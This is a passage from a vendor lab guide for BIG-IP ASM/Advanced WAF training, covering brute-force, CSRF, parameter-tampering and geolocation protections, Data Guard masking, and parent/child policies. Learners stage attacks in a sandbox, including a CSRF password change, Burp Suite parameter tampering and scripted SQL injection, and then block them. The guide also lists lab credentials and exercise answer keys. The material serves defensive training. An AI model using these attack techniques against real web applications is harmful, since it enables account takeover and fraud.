− In Firefox with brute multiple users.iim selected click Play.
After a few successful attack attempts, you’re now blocked by BIG-IP ASM.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 46
ASM Lesson 6 – Brute Force Protection
− Click Stop, and then click Play again. Repeat this two more times.
− Open Internet Explorer and click the Hack Login bookmark, and then attempt to log in
as [email protected] / P@ssw0rd!, and then close the blocked page.
Even when using valid credentials, all requests from this source IP address will be blocked for the length of
the Maximum Prevention Duration.

Question:
How long will this IP address be blocked? ______________________________

− In the Configuration Utility reload the Application > Requests tab.

− Select the most recent blocked log entry, and then under Occurrences click 1.
The Enforcement Action was Alarm and Blocking Page. Notice that the Client IP Address is included in the
details window.
− On the Brute Force Attack Protection tab click [HTTP]/user/login.
− For IP Address, from the Action list select Alarm and Drop, then click Save, then click Apply Policy, and then close
the second tab.
− In Firefox with brute multiple users.iim selected click Play.
After a few successful attack attempts, your connection is now reset.
− Close Firefox, then open Internet Explorer and click the Hack Login bookmark, and then attempt to log in
as [email protected] / abc123, and then close the Internet Explorer window.
Even with valid credentials, requests from this source IP address will be dropped for the length of
the Maximum Prevention Duration.

PREPARE FOR NEXT EXERCISE

− In PuTTY, at the CLI copy and paste the following TMSH commands.
tmsh delete ltm virtual hackazon_virtual
tmsh delete ltm pool hackazon_pool
tmsh delete ltm node 10.1.20.20
tmsh delete ltm policy asm_auto_l7_policy__hackazon_virtual
tmsh delete asm policy hackazon_security_policy
exit

Question and Answer Key

Task 2 – Run a Brute Force Attack
Q: What is the correct password for [email protected]?
A: P@ssw0rd!

Task 4 – Add Brute Force Protection for Specific Usernames

Q: Why didn’t this brute force attack get blocked by the CAPTCHA challenge?
A: The brute force attack attempts weren’t using the same username.

Task 5 – Add Brute Force Protection for Specific IP Addresses

Q: How long will this IP address be blocked?
A: For the length of the Maximum Prevention Duration (60 minutes by default).

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 47
ASM Lesson 7 – CSRF Protection, Parameter Tampering Protection, and Geolocation Enforcement

ASM Lesson 7 – CSRF Protection, Parameter Tampering

Protection, and Geolocation Enforcement

NOTES

________________________________________________________________________________________

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 48
ASM Lesson 7 – CSRF Protection, Parameter Tampering Protection, and Geolocation Enforcement

Exercise – Add CSRF and Parameter Tampering

Protection, and Geolocation Enforcement
• Estimated completion time: 60 minutes.

Task 1 – Attempt a CSRF Attack on an Unprotected Web Site

Examine how a cross-site request forgery (CSRF) attack can be used to issue unauthorized commands from a user
that a web application trusts.

− If needed, re-open your RDP session to the Windows Jumpbox desktop.

− Open PuTTY and open the BIGIP_A saved session and log in as root / default.F5demo.com
− At the CLI copy and paste the following TMSH commands. (NOTE: Use the copy and paste guide inside
the Documents directory.)
tmsh create ltm pool dvwa_pool members add { 10.1.20.17:80 { address 10.1.20.17 } }
tmsh create ltm pool csrf_pool members add { 10.1.20.19:80 { address 10.1.20.19 } }
tmsh create ltm virtual dvwa_virtual destination 10.1.10.35:80 ip-protocol tcp profiles add { tcp { } http { }
} security-log-profiles add { "Log all requests" } pool dvwa_pool
tmsh create ltm virtual csrf_virtual destination 10.1.10.135:80 pool csrf_pool

− Open Internet Explorer and click the CSRF bookmark.

You were just sent this link via a social networking web site. It looks like the same page you’re used to working
with; however it has a link in the middle of the page for a special offer. Notice that the web page you’re on is
hosted on 10.1.10.135. This is a malicious web site, possibly hijacked by the hacker.
− Click the link in the middle of the page for the special offer.
You’re redirected to the DVWA login page. Notice that the page you’re now on is hosted on 10.1.10.35 This is the
legitimate web server.
− Close the page, then open Internet Explorer and click the DVWA bookmark, and then log in as admin / password
Now, let’s say you had opened the web application and logged in first, prior to viewing the link on the social
networking web site.
− On the left menu click CSRF.
This page can be used to allow web application users to change their password. Users should only be able to
change their password once they’ve successfully logged in.
− Click Home, and then scroll down to the bottom of the page.

You are logged in as admin.

− Open a second tab and click the CSRF bookmark.
Now, let’s say you opened the link from the social networking web site using a new tab.
− Scroll down to the bottom of the page.
Note that you aren’t logged in with any user credentials.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 49
ASM Lesson 7 – CSRF Protection, Parameter Tampering Protection, and Geolocation Enforcement
− Click the link in the middle of the page for the special offer.
Notice that you’re on the CSRF page on the actual web site (http://10.1.10.35/vulnerabilities/csrf) and the page
notifies you that your password has been changed.

− Scroll down to the bottom of the page.

You’re logged in as admin on this second tab. The CSRF attack exploited the trust the web application has
with the logged in user (in the first tab).
− In the first tab click Logout, and then attempt to log in again as admin / password
Your login credentials are no longer valid.
− In the second tab click the CSRF bookmark, and then place your mouse over the link and at the bottom of the page
examine what the link does.

When the user clicks on this link it uses the /vulnerabilities/csrf page on the actual web site to change their
password to H@cker.
− Close the second tab.
− In the first tab log in as admin / H@cker, then from the left navigation menu click CSRF, and then change the
password back to password, then click Logout, and then close the Internet Explorer window.
To prevent this, you must add CSRF protection for the vulnerable URL, which is /vulnerabilities/csrf.

Task 2 – Configure CSRF Protection

Create a security policy for dvwa_virtual, and then add cross-site request forgery protection to the security policy.

− Open Chrome and click the BIGIP_A bookmark and log in as admin / admin.F5demo.com
− Open the Security Policies > Policies List page and click Create.
− Use the following information for the new policy, and then click Save.
Policy Name dvwa_security_policy
Policy Template Fundamental
Virtual Server dvwa_virtual (HTTP)
Application Language Unicode (utf-8)
Trusted IP Addresses 10.1.10.0 / 255.255.255.0 (Scroll right and click Add)

− Once the policy is created open the Application Security > CSRF Protection page.
− Select the CSRF Protection checkbox.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 50
ASM Lesson 7 – CSRF Protection, Parameter Tampering Protection, and Geolocation Enforcement
− Select the * checkbox, and then click Delete.

We’re removing the wildcard because we’re only concerned about the page users use to change their passwords
(the /vulnerabilities/csrf page).
− Change from Simple Edit Mode to Advanced Edit Mode.
− For the New URL, from the Method list select GET, and for URL copy and paste /vulnerabilities/csrf/, and then
click Add.

− Leave both Required Parameters and Enforcement Action set to the default values and click Save, and then
click Apply Policy.
− Open Internet Explorer and click the DVWA bookmark, and then log in as admin / password
− Open a second tab and click the CSRF bookmark, and then click the link in the middle of the page for the
special offer, and the close the blocked tab.
The CSRF attempt is now blocked by BIG-IP ASM.
− In the Configuration Utility open the Security > Event Logs > Application > Requests page
(HINT: You can simply click on “Event Logs”.) and scroll through the entries in the log file.
− Select the blocked log entry, and then under Occurrences click 1.

Notice for Violation Reason it reads CSRF token absent.

− Click CSRF attack detected for more details about this attack type.

− In the DVWA page on the left navigation menu click CSRF, and then right-click in the Confirm new password field
and select Inspect element.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 51
ASM Lesson 7 – CSRF Protection, Parameter Tampering Protection, and Geolocation Enforcement
− In the inspection window examine the HTML code below the Change button.

You can see the cross-site request token (csrt) BIG-IP ASM injected into the page to protect it against
CSRF attacks.
− Close the Internet Explorer window.
− In the Configuration Utility open the Application Security > CSRF Protection page, then clear
the CSRF Protection checkbox, then click Save, and then click Apply Policy.

Task 3 – Attempt a Parameter Tampering Attack

Use Burp Suite to change a parameter value between the web form and the web server.

− Open Start > Burp Suite, then in the update dialog box click Close, then click Next, and then click Start Burp.
− Select the Proxy tab, and then click Intercept is on (the button should now read Intercept is off).

− Open Firefox and click the Firefox options button and select Options.

− Click Advanced, and then for Connection click Settings.

− Select the Manual proxy configuration option, and then click OK.
− Click the DVWA bookmark, then log in as bobsmith / password, then click XSS stored and create an entry
named Order, and then copy and paste the following Review. DO NOT click Submit Review.
I would like to place an order for 1 new Dell laptop.

− In Burp Suite click Intercept is off (the button should now read Intercept is on).
− In the DVWA page click Submit Review.
− View the Burp Suite window (you may need to click Forward).
As a malicious user, you can now view and modify the entire HTTP request in Burp Suite before sending it to
the web server.

We’re going to simulate that the parameter named btnSign is actually a “price” parameter. This is an example of
a parameter that is defined on the web form but should NOT be modified. Imagine if this parameter value was
currently set to btnSign=1999.99 (the correct cost of the Dell laptop).
− Change the value of the btnSign parameter to btnSign=10.99, and then click Forward.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 52
ASM Lesson 7 – CSRF Protection, Parameter Tampering Protection, and Geolocation Enforcement
− View the result in the DVWA page.
The request was successfully sent to and returned by the web server.
− Examine the URL for this page, and then close the Firefox window.
You need add parameter tampering protection for the /vulnerabilities/xss_s/ URL.
− In the Configuration Utility open the Event Logs > Application > Requests page.
− Select the newest (at the top) /vulnerabilities/xss_s/ log entry, and then view body portion in
the Request section.

The value of the static btnSign parameter was successfully modified by the malicious user, and this modified
value was forwarded to the web server. The malicious user may have just purchased a new laptop for $10.99!
− In Burp Suite click Intercept is on (the button should now read Intercept is off).

Task 4 – Add Parameter Tampering Protection

Add parameter tampering protection for the btnSign field, and then attempt to modify the parameter value again
after submitting the web form.

− In the Configuration Utility open the Learning and Blocking Settings page.
− Expand Parameters, and then from the Learn New Parameters list select Always.
− Collapse Parameters, then expand URLs, and then from the Learn New HTTP URLs list select Always.
− Click Save, and then click Apply Policy.
− Open a New private window (Firefox) and click the iMacros button, and then the iMacros pane
select Exercises > csrf build.iim and click Play (Loop). Wait for the macro to finish before moving on.
− In the Configuration Utility open the Policies List page and click dvwa_security_policy.
(HINT: You can simply click on “Application Security”.)
− For Policy Building Learning Mode click Disabled, and then click Save.
− Open the Parameters List page and click btnSign.
This is the parameter that was exploited by the parameter tampering attack.
− Clear the Perform Staging checkbox.
− From the Parameter Value Type list select Dynamic content value, and then click Update.
You’re prompted to define extractions. An extraction is the exact URL where this parameter value is defined.
− Click OK.
− On the Parameter > Extractions page select the File Types checkbox, then select no_ext from the list,
and then click Add.
Remember that we need to protect the /vulnerabilities/xss_s/ URL. There is no file type associated with this
URL, so you’ll use the no_ext file type.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 53
ASM Lesson 7 – CSRF Protection, Parameter Tampering Protection, and Geolocation Enforcement
− Select the URLs checkbox, then select HTTP from the list, then select /vulnerabilities/xss_s/ from the list, and then
click Add.

− Click Create, and then on the Parameter Properties page click Update.
− Open the Learning and Blocking Settings page, and then expand Parameters.
− For the Illegal dynamic parameter value violation select the Alarm and Block checkboxes, then click Save,
and then click Apply Policy.

− In Firefox log in as bobsmith / password, then click XSS stored and create an entry
named Order, and then copy and paste the following Review. DO NOT click Submit Review.
I would like to place an order for 1 new Dell laptop.

− In Burp Suite click Intercept is off (the button should now read Intercept is on).
− In the DVWA page click Submit Review.
− In Burp Suite change the value of the btnSign parameter to btnSign=10.99, and then click Forward.
− View the result in the DVWA page.
The parameter tampering attempt is now blocked by BIG-IP ASM.
− Close Burp Suite.
− In the Configuration Utility open the Event Logs > Application > Requests page, then select the newest blocked
log entry, and then examine the Violation that caused BIG-IP ASM to block it.
− In the Attack Type row, click the triangle after Parameter Tampering for more details about this attack.

− In Firefox click the Firefox options button and select Options.

− Click Advanced, then for Connection click Settings, then select the No proxy option, then click OK, and then
close the Options tab.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 54
ASM Lesson 7 – CSRF Protection, Parameter Tampering Protection, and Geolocation Enforcement

Task 5 – Examine Requests from Specific Regions

Use an iRule to simulate request coming from several key regions, and then examine the event log to view where
requests are coming from.

− In the Configuration Utility open the Virtual Server List page and click dvwa_virtual, and then open
the Resources page.
− For iRules click Manage, then add the worldwide_ip_addresses iRule, and then click Finished.
This iRule simulates requests coming from some very specific geolocations.
− Open the Policies List page and click dvwa_security_policy.
− Under the Advanced settings, for Trust XFF Header select the Enabled button, then click Save, and then
click Apply Policy.
This setting will enable BIG-IP ASM to use the X-Forwarded-For value (from the iRule) as the IP address of each
incoming request.
− In Firefox, in the iMacros pane select Exercises > login requests.iim, then in the Max field type 2000,
and then click Play (Loop).
This macro simulates requests to the DVWA login page.
− While the macro is running, in the Configuration Utility open the Event Logs > Application > Requests page.
− Examine the IP addresses of different log entries.
− Mouse over the flag icons of different log entries.

− Select a log entry from the United States.

− In the middle pane click the filter icon next to United States.

− Select Add geolocation to filter.

You can quickly view all requests from a specific country.
− Near the top of the page click the Open Filter icon.

− For Geolocation, edit the value to China, then click Apply Filter, and then examine the results.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 55
ASM Lesson 7 – CSRF Protection, Parameter Tampering Protection, and Geolocation Enforcement

Task 6 – Block Malicious Requests from Specific Geolocations

Identify malicious requests from the North Korea geolocation, and then block all requests from that geolocation.
Then block all requests from Syria.

− In Firefox, in the iMacros pane click Stop.

− Select malicious logins.iim and click Play (Loop).
This macro simulates different SQL injection attempts to the DVWA login page.
− While the macro is running, in the Configuration Utility reload the Event Logs > Application > Requests page.
− Select one of the log entries from Korea, Democratic People's Republic of.

− Click the filter icon before Korea, Democratic People's Republic of and select Add geolocation to filter.

− Select one of the /login.php log entries with a violation rating of 4 or 5.

− Click the filter icon after Violation Rating > 5 (or Violation Rating > 4), and then
select Add violation rating to filter.

Notice this adds this new filter criteria to the previous filter criteria.
− Select any of the log entries and for the Attack signature detected violation, under Occurrences click the number.
You’ve identified that you’re getting several of these malicious SQL injection attempts from
the North Korea geolocation.
− Select the triangle icon after Geolocation.

− Click Disallow Geolocation.

Notice that you’re informed you need to apply the policy.
− Navigate to Security > Application Security and right-click on Geolocation Enforcement and
select Open link in new tab, and then examine the new tab.
The Korea, Democratic People's Republic of geolocation has been added to the Disallowed Geolocation list.
− Click Apply Policy, and then quickly examine the Firefox window with the macro running.
After a couple of requests from other countries, a malicious SQL injection request from North Korea is blocked.
F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 56
ASM Lesson 7 – CSRF Protection, Parameter Tampering Protection, and Geolocation Enforcement
− In the iMacros pane select login requests.iim and click Play (Loop).
While most requests are allowed, many requests are being blocked.
− While the macro is running, in the Configuration Utility reload the Application > Requests tab.
− Click the filter icon.

− For Request Status select Blocked, and then click Apply Filter.
There are now several blocked log entries from North Korea.
− Select one of the blocked log entries and under Occurrences click 1.

− On the Geolocation Enforcement tab click inside the Allowed Geolocations list and begin typing syria, then
select Syrian Arab Republic, and then click <<.

− Click Save, then click Apply Policy, and then close the second tab.
− On the Application > Requests tab click the refresh icon.

This reloads the page with the current filter. There are now requests being blocked from two geolocations.

Task 7 – View the Security Charts

View the built-in BIG-IP ASM security charts.

− Open the Security > Reporting > Application > Charts page
(HINT: You can simply click on “Reporting”.)

→NOTE: It will take up to five minutes for the recent transaction data to load. Perhaps use this time to use the
restroom or get a beverage.

− From the Time Period list select Last Hour, and from the Chart type list select Stacked.
− From the View By list select Client Countries.
We can see the origin of all requests this past hour.
− From the View By list select Request Types, then in the Details section click Blocked, and then from
the View By list select Violations.
We can see the reason for all blocked requests.
− From the View By list select Client Countries.
We can see the origin of all blocked requests.
F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 57
ASM Lesson 7 – CSRF Protection, Parameter Tampering Protection, and Geolocation Enforcement

PREPARE FOR NEXT EXERCISE

− In Firefox, in the iMacros pane click Stop, and then close the Firefox window.
− In PuTTY, at the CLI copy and paste the following TMSH commands.
tmsh delete ltm virtual csrf_virtual
tmsh delete ltm pool csrf_pool
tmsh delete ltm node 10.1.20.19
tmsh delete ltm virtual dvwa_virtual
tmsh delete ltm pool dvwa_pool
tmsh delete ltm node 10.1.20.17
tmsh delete ltm policy asm_auto_l7_policy__dvwa_virtual
tmsh delete asm policy dvwa_security_policy
exit

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 58
ASM Lesson 8 – Data Guard and PCI Compliance

ASM Lesson 8 – Data Guard and PCI Compliance

NOTES

________________________________________________________________________________________

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 59
ASM Lesson 8 – Data Guard and PCI Compliance

Exercise – Use Data Guard and Attain PCI Compliance

• Estimated completion time: 45 minutes.

Task 1 – View the PCI Compliance Report

Create a security policy for dvwa_virtual, and then examine and update the PCI Compliance report.

− If needed, re-open your RDP session to the Windows Jumpbox desktop.

− Open Chrome and click the BIGIP_A bookmark and log in as admin / admin.F5demo.com
− Open the Virtual Server List page and examine dvwa_virtual.
Note that this virtual server is currently using port 80, which is not PCI compliant.
− Open the Security Policies > Policies List page and click Create.
− Use the following information for the new policy, and then click Save.
Policy Name dvwa_security_policy
Policy Template Rapid Deployment Policy
Virtual Server dvwa_virtual (HTTP)

− Once the policy is created open the Security > Reporting > Application > PCI Compliance page.
The PCI Compliance Report identifies security measures required to comply with PCI-DSS 3.0. It indicates which
measures are met, which are not met, and which are not relevant. Currently there are several PCI requirements
that aren’t yet met.
− Click Identify and authenticate access to system components.
To meet PCI compliance, there needs to be unique usernames for all BIG-IP system users.
− To fix this compliance issue right-click on the word here and select Open link in a new tab.
− In the new tab click Create, then create a new user (use your first name for the User Name and
admin.F5demo.com for the Password, and make yourself an Administrator), then click Finished, and then close
the second tab.
− Reload the PCI Compliance tab.
You’ve now completed PCI compliance sub-requirement 8.
− Click User is forced to change password every 90 days.
To meet PCI compliance, there needs to be a strong password policy on the BIG-IP system.
− To fix this compliance issue click Fix Automatically.
After the page refreshes, you’ve now completed PCI compliance sub-requirement 8b. This has created a
password policy on the BIG-IP system where all BIG-IP system users must change their passwords every 90 days.
− Click Encrypt transmissions of cardholder data across open, public networks.
To meet PCI compliance, the web application must be using HTTPS and a PCI compliant SSL profile.
F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 60
ASM Lesson 8 – Data Guard and PCI Compliance
− To fix part of this compliance issue click Fix Automatically.
You’re notified that all your insecure SSL profiles will be removed.
− Click OK.
This added a PCI compliant SSL client profile to the virtual server; however the virtual server is still using HTTP.
− Navigate to Local Traffic and right-click on Virtual Servers and select Open link in new tab, and in the new tab
click dvwa_virtual.
− Modify the Service Port to 443.
− Examine the SSL Profile (Client) value.
BIG-IP ASM added a new SSL profile named pci-compliant-clientssl.
− Click Update, and then close the second tab.
− Reload the PCI Compliance tab.
You’ve now completed PCI compliance sub-requirement 4.
− Click Develop and maintain secure systems and applications.
To meet PCI compliance the security policy must have signature sets attached, the signatures must be enforced,
and the security policy must be in blocking mode.
− Navigate to Security and right-click on Application Security and select Open link in new tab, and in the new tab
click dvwa_security_policy.
− For Enforcement Mode click the Blocking button, and then click Save.
− Click Attack Signatures, then click the … next to Enforce and select Enforce all Staged Signatures, then close the
second tab.
− Reload the PCI Compliance tab.
You’ve now completed PCI compliance sub-requirement 6. The final step is sub requirement 3.
− Click Protect stored cardholder data.
The final step for PCI compliance is to enable Data Guard to protect credit card numbers.

Task 2 – Examine and then Protect Against Information Leakage

View the threat of information leakage, and then update dvwa_security_policy to prevent this PCI compliance
violation.

− Open Firefox and click the DVWA 443 bookmark (add an exception), and then log in as bobsmith / password.
− Click XSS stored, then create an entry named Order notes, then copy and paste the following Review, and then
click Submit Review.
Please bill my credit card #4012-8888-8888-1881.

Credit card numbers are being sent in cleartext in the HTTP response. This is known as information leakage and is
not PCI compliant.
− In the Configuration Utility on the PCI Compliance page, within the Description section right-click
on Data Guard screen and select Open link in new tab.
− In the new tab select the Data Guard checkbox, and then click Save.
Notice that by default Data Guard protects both credit card numbers and US social security numbers. Also notice
that the security policy is currently configured to block requests when information leakage is detected. You don’t
want to block these responses; you just want the sensitive data masked.
F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 61
ASM Lesson 8 – Data Guard and PCI Compliance
− Open the Learning and Blocking Settings page, and then expand Data Guard.

Notice that this violation includes the Block checkbox. That means that whenever a credit card number
or US social security number is seen in an HTTP response the response will be blocked.
− Clear the Block checkbox, then click Save, and then click Apply Policy.
− In the DVWA page click XSS stored and examine the Order notes entry.
Credit card numbers are now being masked by BIG-IP ASM, except for the last four digits.
− Create another entry named My details, then copy and paste the following Review, and then click Submit Review.
Name: Bob Smith, SSN: 123-45-6789.

Social security numbers are also being masked by BIG-IP ASM.

− In the Configuration Utility reload the PCI Compliance tab.
We have now met all the security measures required for PCI compliance.
− Click Printable Version, and then open the PDF.
− Scroll down to the Known vulnerabilities protection section.
Customers can keep this PDF in their records to verify that they’ve met PCI compliance requirements.
− Close the PDF tab.

Task 3 – Create a Mask for Different Country Code

Update the Data Guard settings to prevent information leakage for UK national insurance numbers.

− In Firefox create an entry named My UK ID, then copy and paste the following Review, and then
click Submit Review.
My UK national insurance ID number is CM457829G.

The user’s confidential UK national insurance number is sent in the HTTP response. Much like the US social
security number, these entries should be masked. To do this, you must understand the design of this custom
pattern. All UK national insurance numbers begin with two capital letters, followed by six numbers, followed by
one last capital number.
− In the Configuration Utility, on the Data Guard tab select the Custom Patterns checkbox.
− In the New Pattern field copy and paste the following regular expression, and then click Add.
[A-Z]{2}[0-9]{6}[A-Z]

In this custom pattern, the [A-Z] identifies any capital letter between A through Z, and [2] identifies two of those
capital letters. The [0-9] identifies any number between 0 through 9, and [6] identifies 6 of those numbers.
And then finally the [A-Z] identifies one final capital letter.
− Click Save, then click Apply Policy.
− In the DVWA page click XSS stored.
The user’s UK national insurance number is now being masked by BIG-IP ASM.

Let’s say you wanted to display the last 3 characters of the number, similar to the last 4 numbers of
a social security number.
F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 62
ASM Lesson 8 – Data Guard and PCI Compliance
− In the Configuration Utility select the previous custom pattern and click Remove.
− In the New Pattern field copy and paste the following regular expression, then click Add, then click Save, then
click Apply Policy.
[A-Z]{2}[0-9]{4}

− In the DVWA page click XSS stored.

− Create another entry named UK ID?, then copy and paste the following Review, and then click Submit Review.
My UK national insurance ID number is jw817302q.

Questions:
Was this user ID masked? __________________

Why or why not? ____________________________________________________

− Create another entry named UK ID?, then copy and paste the following Review, and then click Submit Review.
My UK national insurance ID number is PR 59 44 38 D.

Questions:
Was this user ID masked? __________________

Why or why not? ____________________________________________________

− In the Configuration Utility, on the Data Guard tab copy and paste the following three regular expressions (be sure
to click Add for each), then click Save, then click Apply Policy, and then close the second tab.
[a-z]{2}[0-9]{4}

[A-Z]{2} [0-9]{2} [0-9]{2}

[a-z]{2} [0-9]{2} [0-9]{2}

− In the DVWA page click XSS stored.

All the UK national insurance numbers are now being masked by BIG-IP ASM.
− Create another entry named UK ID?, then copy and paste the following Review, and then click Submit Review.
My UK national insurance ID number is qq 11 22 33 z.

Questions:
Was this user ID masked? __________________

− Click Setup, then click Create / Reset Database, and then close the Firefox window.

PREPARE FOR NEXT EXERCISE

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 63
ASM Lesson 8 – Data Guard and PCI Compliance

Question and Answer Key

Task 3 – Create a Mask for Different Country Code
Q: Was this user ID masked?
A: No

Q: Why or why not?

A: The custom mask specifies capital letters only.

Q: Was this user ID masked?

A: No

Q: Why or why not?

A: The custom mask doesn’t account for spaces.

Q: Was this user ID masked?

A: Yes

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 64
ASM Lesson 9 – Parent and Child Security Policies

ASM Lesson 9 – Parent and Child Security Policies

NOTES

________________________________________________________________________________________

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 65
ASM Lesson 9 – Parent and Child Security Policies

Exercise – Use Parent and Child Security Policies

• Estimated completion time: 45 minutes.

Task 1 – Create and Configure a Parent Security Policy

Create a parent security policy, then assign the required and optional inherited settings, and then configure
the parent security policy settings.

− If needed, re-open your RDP session to the Windows Jumpbox desktop.

− Open PuTTY and open the BIGIP_A saved session and log in as root / default.F5demo.com
− At the CLI copy and paste the following TMSH commands. (NOTE: Use the copy and paste guide inside
the Documents directory.)
tmsh create ltm pool dvwa_pool members add { 10.1.20.17:80 { address 10.1.20.17 } }
tmsh create ltm virtual dvwa_virtual destination 10.1.10.35:80 ip-protocol tcp profiles add { tcp { } http { }
} security-log-profiles add { "Log all requests" } pool dvwa_pool
tmsh create ltm pool hackazon_pool members add { 10.1.20.20:80 { address 10.1.20.20 } }
tmsh create ltm virtual hackazon_virtual destination 10.1.10.43:80 ip-protocol tcp profiles add { tcp { } http
{ } } security-log-profiles add { "Log all requests" } pool hackazon_pool

− Open Chrome and click the BIGIP_A bookmark and log in as admin / admin.F5demo.com
− Open the Security Policies > Policies List page and click Create.
− Use the following information for the new policy, and then click Save.
Policy Name parent_security_policy
Policy Type Parent
Policy Template Comprehensive
Signature Staging Disabled
Server Technologies Apache Tomcat, PHP, Unix/Linux

− Once the policy is created click parent_security_policy, and then in the left panel click Inheritance Settings.
− Configure the following inheritance settings, and then click Save.
o Attack Signatures: None
o Data Guard: Optional
o Evasion Techniques: None
o File Types: Mandatory
o General Settings: Mandatory
o Headers: None
o HTTP Protocol Compliance: None
o IP Addresses and Geolocations: Mandatory
o Parameters: Mandatory
o Policy Building Process: Mandatory
o WebSocket Protocol Compliance: None
− Open the Learning and Blocking Settings page, and then expand Attack Signatures and click Change.
− Add the Medium Accuracy Signatures, Cross Site Scripting Signatures, Other Application Attacks Signatures,
and SQL Injection Signatures, and then click Change.

F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 66
ASM Lesson 9 – Parent and Child Security Policies
− Collapse Attack Signatures, and then expand Data Guard and clear the Block checkbox.
− Collapse DataGuard, then expand File Types, and then from the Learn New File Types list select Always.
− Collapse File Types, then expand General Settings, then for the Request length exceeds defined buffer size
violation select the Alarm and Block checkboxes.
− Collapse General Settings, then expand Parameters, and then from the Learn New Parameters list
select Never (wildcard only).
− Clear the Learn, Alarm, and Block checkboxes for ALL parameter violations, and then click Save.

− Open the Application Security > Data Guard page and select the Data Guard checkbox, and then click Save.
− Open the Application Security > Geolocation Enforcement page and add both Iran, Islamic Republic of
and Syrian Arab Republic to the Disallowed Geolocations list.
− Click Save, and then click Apply Policy.

Task 2 – Create a Child Security Policy

Create a child security policy for dvwa_virtual that uses parent_security_policy as its parent policy.

− Open the Policies List page and click Create.

(HINT: You can simply click on “Application Security”.)
− Use the following information for the new policy. (NOTE: Don not click Save until you’ve filled the table.)
Policy Name dvwa_security_policy
Policy Type Security
Policy Template Comprehensive
Parent Policy parent_security_policy
Virtual Server dvwa_virtual (HTTP)

Question: Of the following parent policy settings, which can be changed, and which can’t?

Policy option Can be changed Can’t be changed

Application Language
Enforcement Mode
Policy Builder Learning Mode
Auto-Added Signature Accuracy
Trusted IP Addresses
Policy Builder Learning Speed
Signature Staging
Server Technologies
Policy is Case Sensitive
F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 67
ASM Lesson 9 – Parent and Child Security Policies
− Click Save.
− Once the policy is created, click dvwa_security_policy, and then click Inheritance Settings.

Question:
Which options can be declined? ________________________________________

− For Server Technologies select Decline, and then click Save.

− Click the back-arrow button to return to the Policies List page.

− Click parent_security_policy, and then click Inheritance Settings.

− Expand the Data Guard and Server Technologies sections.

You can see which child security policies have accepted and which have declined the optional policy settings.
− For Attack Signatures, change the Inheritance Settings to Mandatory, and then click Save.

Task 3 – Examine Child Inheritance

Examine the settings of parent_security_policy that can and cannot be modified in a child security policy.

− Click the back-arrow button to return to the Policies List page, and then click dvwa_security_policy.
− For Server Technologies attempt to delete Apache Tomcat from the list.

Questions:
Were you able to delete the server technology? ___________________

Why or why not? ____________________________________________________________

− Click Save, and then open the Learning and Blocking Settings page.
− From the currently being edited security policy list note that you are editing dvwa_security_policy.

It’s important to identify which security policy you’re working with when managing several security policies
on the same BIG-IP system.
− Expand Attack Signatures and click Change.
− Attempt to remove the Medium Accuracy Signatures set.
F5 WWFE Lab Guide – BIG-IP ASM/Adv WAF Full Course, Partner UDF Version v15.1A Page | 68
ASM Lesson 9 – Parent and Child Security Policies
− Attempt to add the Command Execution Signatures and click Change.
Because Attack Signatures was marked as Mandatory, attack signature sets can’t be removed from
the child policy, however additional signature sets can be added to the child policy. Remember, this additional
signature set won’t be added to other child policies.
− Collapse Attack Signatures, and then expand Data Guard and note the Block setting.
The Block checkbox is disabled because the Data Guard category was marked as Mandatory in the parent policy.
− Collapse Data Guard, and then expand File Types and note the Learn New File Types and violations settings.
The Learn New File Types and all violation settings inherited the parent policy settings and cannot be changed
because the File Types category was marked as Mandatory in the parent policy.
− Collapse File Types, and then expand General Settings and note the Request length exceeds defined buffer size
settings.
The settings in this section can’t be changed, as they are marked as Mandatory in the parent policy.
− Collapse General Settings, and then expand Headers.
The settings in this section can be modified for the child security policy, as the inheritance setting for
the Headers category was left as None.
− Click Save.
− Open the Data Guard page and attempt to clear the Data Guard checkbox.
− Open the Geolocation Enforcement page and attempt to remove Iran, Islamic Republic of from the Disallowed
Geolocations list.
− Attempt to add Korea, Democratic People’s Republic of to the Disallowed Geolocations list.

Questions:
Were you able to delete Iran? ______________

Were you able to add North Korea? ______________

Why did you get these results? __________________________________________________

Will other child security policies see North Korea as a disallowed geolocation? _____________

− Click Save.

→NOTE: The next steps are to ensure that the attack signatures in the next task will be blocked.

− Open the Parameters List page, and then click the wildcard (*).
− Clear the Perform Staging checkbox.
− For Maximum Length select the Any option, then click Update, and then click Apply Policy.

